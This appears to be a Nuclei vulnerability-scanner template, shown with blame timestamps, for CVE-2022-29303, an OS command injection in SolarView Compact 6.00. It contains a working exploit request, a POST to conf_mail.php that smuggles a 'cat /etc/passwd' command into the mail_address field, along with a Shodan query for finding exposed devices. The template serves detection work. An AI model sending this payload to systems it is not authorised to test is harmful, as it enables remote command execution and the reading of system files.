nuclei-templates/http/cves/2022/CVE-2022-29303.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-05-18 10:39:07 +00:00
id: CVE-2022-29303
info:
name: SolarView Compact 6.00 - OS Command Injection
2022-05-18 13:57:46 +00:00
author: badboycxcc
severity: critical
description: |
SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
2022-05-18 10:39:07 +00:00
reference:
- https://www.exploit-db.com/exploits/50940
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
- https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
- http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29303
cwe-id: CWE-77
epss-score: 0.95016
2022-05-18 10:39:07 +00:00
metadata:
max-request: 1
2022-05-18 10:39:07 +00:00
shodan-query: http.html:"SolarView Compact"
2023-06-04 08:13:42 +00:00
verified: true
tags: injection,solarview,edb,packetstorm,cve,cve2022,rce
2022-05-18 10:39:07 +00:00
variables:
cmd: "cat${IFS}/etc/passwd"
http:
2022-05-18 10:39:07 +00:00
- raw:
- |
2022-07-21 08:25:18 +00:00
@timeout: 25s
2022-05-18 10:39:07 +00:00
POST /conf_mail.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-05-18 10:40:44 +00:00
2022-05-18 10:39:07 +00:00
mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
# Enhanced by mp on 2022/06/01